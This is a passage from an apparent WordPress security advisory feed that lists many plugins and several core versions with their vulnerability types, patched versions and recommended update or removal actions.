Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Shortcode for Font Awesome

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: GoDaddy Email Marketing

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BuddyPress Activity Plus

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: GD Rating System

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Request Forgery via ‘wpfc_purgecache_varnish_callback’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Quick Chat

Vulnerability: SQL Injection
Patched Version: 4.00
Recommended Action: Update to version 4.00, or a newer patched version

Plugin: Quick Event Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 9.7.5
Recommended Action: Update to version 9.7.5, or a newer patched version

Plugin: typofr

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Craw Data

Vulnerability: Server Side Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP All Export Pro

Vulnerability: Authenticated Remote Code Execution
Patched Version: 1.7.9
Recommended Action: Update to version 1.7.9, or a newer patched version

Plugin: Gallery for Social Photo

Vulnerability: Subscriber+ SQL Injection
Patched Version: 1.0.0.27
Recommended Action: Update to version 1.0.0.27, or a newer patched version

Core: WordPress

Vulnerability: jQuery Prototype Pollution
Patched Version: 3.7.38
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.38, 3.8.38, 3.9.36, 4.0.35, 4.1.35, 4.2.32, 4.3.28, 4.4.27, 4.5.26, 4.6.23, 4.7.23, 4.8.19, 4.9.20, 5.0.16, 5.1.13, 5.2.15, 5.3.12, 5.4.10, 5.5.9, 5.6.8, 5.7.6, 5.8.4, 5.9.2

Plugin: WP SMS – Ultimate SMS & MMS Notifications, 2FA, OTP, and Integrations with WooCommerce, GravityForms, and More

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 6.5.2
Recommended Action: Update to version 6.5.2, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Missing Authorization
Patched Version: 6.5.8
Recommended Action: Update to version 6.5.8, or a newer patched version

Plugin: verwei.se – WordPress – Twitter

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Clerk

Vulnerability: Authorization Bypass via Insufficient Validation
Patched Version: 3.8.3
Recommended Action: Update to version 3.8.3, or a newer patched version

Plugin: Video Grid

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.22
Recommended Action: Update to version 1.22, or a newer patched version

Plugin: Quotes and Tips by BestWebSoft

Vulnerability: Cross-Site Scripting
Patched Version: 1.20
Recommended Action: Update to version 1.20, or a newer patched version

Plugin: Popup with fancybox

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 3.6
Recommended Action: Update to version 3.6, or a newer patched version

Plugin: Mantenimiento web

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.9
Recommended Action: Update to version 0.9, or a newer patched version

Plugin: Autoptimize

Vulnerability: Unsafe File Upload to Cross-Site Scripting
Patched Version: 2.7.8
Recommended Action: Update to version 2.7.8, or a newer patched version

Core: WordPress

Vulnerability: Server Side Request Forgery
Patched Version: 3.7.31
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.31, 3.8.31, 3.9.29, 4.0.28, 4.1.28, 4.2.25, 4.3.21, 4.4.20, 4.5.19, 4.6.16, 4.7.14, 4.8.11, 4.9.12, 5.0.7, 5.1.3, 5.2.4

Plugin: The Plus Addons for Elementor Page Builder

Vulnerability: Open Redirect
Patched Version: 4.1.11
Recommended Action: Update to version 4.1.11, or a newer patched version

Plugin: WORDPRESS VIDEO GALLERY

Vulnerability: SQL Injection
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: Printful Integration for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: Dynamic Font Replacement DFR4WP EN

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Vanguard – Marketplace Digital Products PHP7

Vulnerability: Marketplace Digital Products PHP7 <= 2.1
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Career Openings

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Carousel For WPBakery Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Crowdfunding

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: InPost Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.2.1
Recommended Action: Update to version 2.1.2.1, or a newer patched version

Plugin: Jeg Elementor Kit

Vulnerability: Unauthenticated Authorization Bypass
Patched Version: 2.5.7
Recommended Action: Update to version 2.5.7, or a newer patched version

Plugin: wordpress vertical image slider plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.17
Recommended Action: Update to version 1.2.17, or a newer patched version

Plugin: Simple Personal Message

Vulnerability: Authenticated SQL Injection
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Replyable – Subscribe to Comments and Reply by Email

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: WP Support Plus Responsive Ticket System

Vulnerability: Stored Cross-Site Scripting
Patched Version: 9.1.2
Recommended Action: Update to version 9.1.2, or a newer patched version

Plugin: WWM Social Share On Image Hover

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Page Builder: Pagelayer – Drag and Drop website builder

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting via Header/Footer
Patched Version: 1.7.8
Recommended Action: Update to version 1.7.8, or a newer patched version

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Authenticated (Administrator+) SQL Injection via ‘orderby’
Patched Version: 5.4.11
Recommended Action: Update to version 5.4.11, or a newer patched version

Plugin: Cyr to Lat enhanced

Vulnerability: Authenticated SQL Injection
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: Event Tickets and Registration

Vulnerability: Open Redirect
Patched Version: 5.2.2
Recommended Action: Update to version 5.2.2, or a newer patched version

Plugin: FunnelKit Checkout

Vulnerability: Unauthenticated Arbitrary Content Deletion
Patched Version: 3.11.0
Recommended Action: Update to version 3.11.0, or a newer patched version

Plugin: Fluid Responsive Slideshow

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.7
Recommended Action: Update to version 2.2.7, or a newer patched version

Plugin: Affiliates Manager

Vulnerability: CSV Injection
Patched Version: 2.9.14
Recommended Action: Update to version 2.9.14, or a newer patched version

Plugin: SALERT – Fake Sales Notification WooCommerce

Vulnerability: Missing Authorization via salert_save_settings_with_ajax()
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: HUSKY – Products Filter Professional for WooCommerce

Vulnerability: Products Filter for WooCommerce <= 1.1.9
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Journey Analytics

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.13
Recommended Action: Update to version 1.0.13, or a newer patched version

Plugin: Error Log Viewer by BestWebSoft

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: 2Checkout Add-on for iThemes Exchange

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: PixTypes

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ShiftController Employee Shift Scheduling

Vulnerability: Cross-Site Request Forgery via get
Patched Version: 4.9.24
Recommended Action: Update to version 4.9.24, or a newer patched version

Plugin: JVM Gutenberg Rich Text Icons

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: StagTools

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: AnyComment

Vulnerability: Race Condition
Patched Version: 0.2.18
Recommended Action: Update to version 0.2.18, or a newer patched version

Plugin: Fontsampler

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 0.4.13
Recommended Action: Update to version 0.4.13, or a newer patched version

Plugin: Display Post Metadata

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1.6.6
Recommended Action: Update to version 4.1.6.6, or a newer patched version

Plugin: About Me

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CURCY – Multi Currency for WooCommerce – The best free currency exchange plugin – Run smoothly on WooCommerce 8.x

Vulnerability: Missing Authorization to Currency Exchange Retrieval
Patched Version: 2.1.26
Recommended Action: Update to version 2.1.26, or a newer patched version

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.7
Recommended Action: Update to version 2.3.7, or a newer patched version

Plugin: CMS Commander – Manage Multiple Sites

Vulnerability: Authorization Bypass through Use of Insufficiently Unique Cryptographic Signature
Patched Version: 2.288
Recommended Action: Update to version 2.288, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Predictive Search

Vulnerability: Missing Authorization
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Template Name
Patched Version: 3.7.22
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.22, 3.8.22, 3.9.20, 4.0.19, 4.1.19, 4.2.16, 4.3.12, 4.4.11, 4.5.10, 4.6.7, 4.7.6, 4.8.2

Plugin: Superb Social Media Share Buttons and Follow Buttons for WordPress

Vulnerability: Missing Authorization via spbsmAjax
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: CoSchedule

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.9
Recommended Action: Update to version 3.3.9, or a newer patched version

Plugin: WP Register Profile With Shortcode

Vulnerability: Cross-Site Request Forgery to User Password Reset
Patched Version: 3.6.0
Recommended Action: Update to version 3.6.0, or a newer patched version

Plugin: Photo Gallery by Ays – Responsive Image Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.1.7
Recommended Action: Update to version 5.1.7, or a newer patched version

Plugin: Link Optimizer Lite

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Cross-Site Request Forgery via permalink_setup
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: Smarty for WordPress

Vulnerability: Cross-Site Request Forgery via displaySmartyManagementPage
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Broken Link Checker

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.10.2
Recommended Action: Update to version 1.10.2, or a newer patched version

Plugin: MailPoet Newsletters (Previous)

Vulnerability: SQL Injection
Patched Version: 2.7.3
Recommended Action: Update to version 2.7.3, or a newer patched version

Plugin: Cross-RSS

Vulnerability: Path Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Safe SVG

Vulnerability: Cross-Site Scripting Bypass
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Countdown, Coming Soon, Maintenance – Countdown & Clock

Vulnerability: Pro Features Lock Bypass
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: Easy Digital Downloads – Invoices

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Contextual Related Posts

Vulnerability: Cross-Site Request Forgery in crpClearCache
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: miniOrange Social Login and Register (Discord, Google, Twitter, LinkedIn)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 7.6.0
Recommended Action: Update to version 7.6.0, or a newer patched version

Plugin: CRM Perks Forms – WordPress Form Builder

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: I Recommend This

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 3.7.3
Recommended Action: Update to version 3.7.3, or a newer patched version

Plugin: The Plus Addons for Elementor Page Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1.12
Recommended Action: Update to version 4.1.12, or a newer patched version

Plugin: Website Builder by SeedProd — Theme Builder, Landing Page Builder, Coming Soon Page, Maintenance Mode

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 5.1.2
Recommended Action: Update to version 5.1.2, or a newer patched version

Plugin: Disable User Login

Vulnerability: Missing Authorization to Unauthenticated Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Booking calendar, Appointment Booking System

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 3.2.12
Recommended Action: Update to version 3.2.12, or a newer patched version

Core: WordPress

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.7.28
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.28, 3.8.28, 3.9.26, 4.0.25, 4.1.25, 4.2.22, 4.3.18, 4.4.17, 4.5.16, 4.6.13, 4.7.12, 4.8.8, 4.9.9, 5.0.1

Plugin: TheCartPress eCommerce Shopping Cart

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Product Import Export for WooCommerce – Import Export Product CSV Suite

Vulnerability: Missing Authorization to CSV Import
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: Contact Form Email

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.66
Recommended Action: Update to version 1.2.66, or a newer patched version

Plugin: SIS Handball

Vulnerability: Authenticated (Administrator+) SQL Injection via ‘orderby’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: YASR – Yet Another Star Rating Plugin for WordPress

Vulnerability: Cross-Site Scripting via source
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Ditty – Responsive News Tickers, Sliders, and Lists

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.25
Recommended Action: Update to version 3.1.25, or a newer patched version

Plugin: My Calendar – Accessible Event Manager

Vulnerability: Subscriber+ Reflected Cross-Site Scripting
Patched Version: 3.2.18
Recommended Action: Update to version 3.2.18, or a newer patched version

Plugin: Captcha

Vulnerability: 4.4.4
Patched Version: 4.4.5
Recommended Action: Update to version 4.4.5, or a newer patched version

Plugin: Download Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.44
Recommended Action: Update to version 3.2.44, or a newer patched version

Plugin: MainWP Boilerplate Extension

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Scripting
Patched Version: 2.9.97
Recommended Action: Update to version 2.9.97, or a newer patched version

Plugin: Google Forms

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 0.91
Recommended Action: Update to version 0.91, or a newer patched version

Plugin: RSVP and Event Tickets, Event Management, Events Calendar Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 3.8.5
Recommended Action: Update to version 3.8.5, or a newer patched version

Plugin: Woo Custom Checkout Field

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: Video Lead Form

Vulnerability: Cross-Site Scripting
Patched Version: 0.6
Recommended Action: Update to version 0.6, or a newer patched version

Plugin: Awin Data Feed

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: Tagbox – UGC Galleries, Social Media Widgets, User Reviews & Analytics

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced Search

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: White Label CMS

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: Code Snippets

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.14.4
Recommended Action: Update to version 2.14.4, or a newer patched version

Plugin: Ad Invalid Click Protector (AICP)

Vulnerability: Cross-Site Request Forgery to Arbitrary Ban Deletion
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Core: WordPress

Vulnerability: Open Redirect
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: WP Photo Album Plus

Vulnerability: SQL Injection
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: MainWP Wordfence Extension

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0.8
Recommended Action: Update to version 4.0.8, or a newer patched version

Plugin: Thumbs Rating

Vulnerability: Race Condition
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Login Configurator

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CM Tooltip Glossary

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.3.5
Recommended Action: Update to version 3.3.5, or a newer patched version

Plugin: Form Block

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: GigPress

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 2.3.29
Recommended Action: Update to version 2.3.29, or a newer patched version

Plugin: Gallery Bank – WordPress Photo Gallery Plugin

Vulnerability: Arbitrary File Upload
Patched Version: 3.0.61
Recommended Action: Update to version 3.0.61, or a newer patched version

Plugin: Motors – Car Dealer, Classifieds & Listing

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: WordPress Popular Posts

Vulnerability: Authenticated Arbitrary File Upload
Patched Version: 5.3.3
Recommended Action: Update to version 5.3.3, or a newer patched version

Plugin: ImageInject

Vulnerability: Cross-Site Scripting
Patched Version: 1.16
Recommended Action: Update to version 1.16, or a newer patched version

Plugin: Advanced Editor Tools

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.2.3
Recommended Action: Update to version 4.2.3, or a newer patched version

Plugin: WP Table Builder – WordPress Table Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.10
Recommended Action: Update to version 1.3.10, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Insufficient Access Control to Plugin Deactivation
Patched Version: 1.3.60
Recommended Action: Update to version 1.3.60, or a newer patched version

Plugin: Full Width Banner Slider Wp

Vulnerability: Reflected Cross-Site Scripting via search_term
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: Ultimate Product Catalog

Vulnerability: Authenticated SQL Injection
Patched Version: 4.2.3
Recommended Action: Update to version 4.2.3, or a newer patched version

Plugin: AutomateWoo

Vulnerability: Missing Authorization
Patched Version: 5.7.6
Recommended Action: Update to version 5.7.6, or a newer patched version

Plugin: WBW Currency Switcher for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: RSS Includes Pages

Vulnerability: Cross-Site Scripting
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Cross-Site Request Forgery to Order Title Update
Patched Version: 3.9.7
Recommended Action: Update to version 3.9.7, or a newer patched version

Plugin: Spicy Blogroll

Vulnerability: Local File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ANAC XML Bandi di Gara

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Yoast SEO: Local

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 15.0
Recommended Action: Update to version 15.0, or a newer patched version

Plugin: Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder

Vulnerability: Missing Authorization via save_popup_enabled_state
Patched Version: 1.18.0
Recommended Action: Update to version 1.18.0, or a newer patched version

Plugin: wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.12
Recommended Action: Update to version 2.0.12, or a newer patched version

Plugin: MultiVendorX – The Ultimate WooCommerce Multivendor Marketplace Solution

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.8.4
Recommended Action: Update to version 3.8.4, or a newer patched version

Plugin: Use Any Font | Custom Font Uploader

Vulnerability: Unauthenticated Arbitrary CSS Appending
Patched Version: 6.2.1
Recommended Action: Update to version 6.2.1, or a newer patched version

Plugin: Erident Custom Login and Dashboard

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.5.9
Recommended Action: Update to version 3.5.9, or a newer patched version

Plugin: WHA Crossword

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Image Regenerate & Select Crop

Vulnerability: Missing Authorization
Patched Version: 7.2.0
Recommended Action: Update to version 7.2.0, or a newer patched version

Plugin: ImageLinks Interactive Image Builder for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Request Forgery via save
Patched Version: 2.25.2
Recommended Action: Update to version 2.25.2, or a newer patched version

Plugin: Jibu Pro

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Path Traversal
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: webapp-builder

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Limit Login Attempts

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Slider Revolution

Vulnerability: Directory Traversal
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: ActiveHelper LiveHelp Live Chat

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: Borderless – Widgets, Elements, Templates and Toolkit for Elementor & Gutenberg

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.4.9
Recommended Action: Update to version 1.4.9, or a newer patched version

Plugin: Event Monster – Event Management, Tickets Booking, Upcoming Event

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Dashboard Widgets Suite

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Libsyn Publisher Hub

Vulnerability: Sensitive Information Exposure
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: Trust Payments Gateway for WooCommerce (JavaScript Library)

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Missing Authorization via delete_pageview
Patched Version: 5.0.6
Recommended Action: Update to version 5.0.6, or a newer patched version

Plugin: Dan's Embedder for Google Calendar

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: SendPress Newsletters

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.23.11.6
Recommended Action: Update to version 1.23.11.6, or a newer patched version

Plugin: WP Emoji One

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Live Chat from ClickDesk – Live Chat – Help Desk Plugin for Websites

Vulnerability: Cross-Site Scripting
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Google Map Shortcode

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Import any XML, CSV or Excel File to WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.6.3
Recommended Action: Update to version 3.6.3, or a newer patched version

Plugin: Cool Tag Cloud

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.26
Recommended Action: Update to version 2.26, or a newer patched version

Plugin: WP Attachment Export

Vulnerability: Arbitrary File Download
Patched Version: 0.2.4
Recommended Action: Update to version 0.2.4, or a newer patched version

Plugin: Tidio – Live Chat & AI Chatbots

Vulnerability: Sensitive Information Disclosure
Patched Version: 5.3.0
Recommended Action: Update to version 5.3.0, or a newer patched version

Plugin: Videopack

Vulnerability: Remote Code Execution
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: illi Link Party!

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
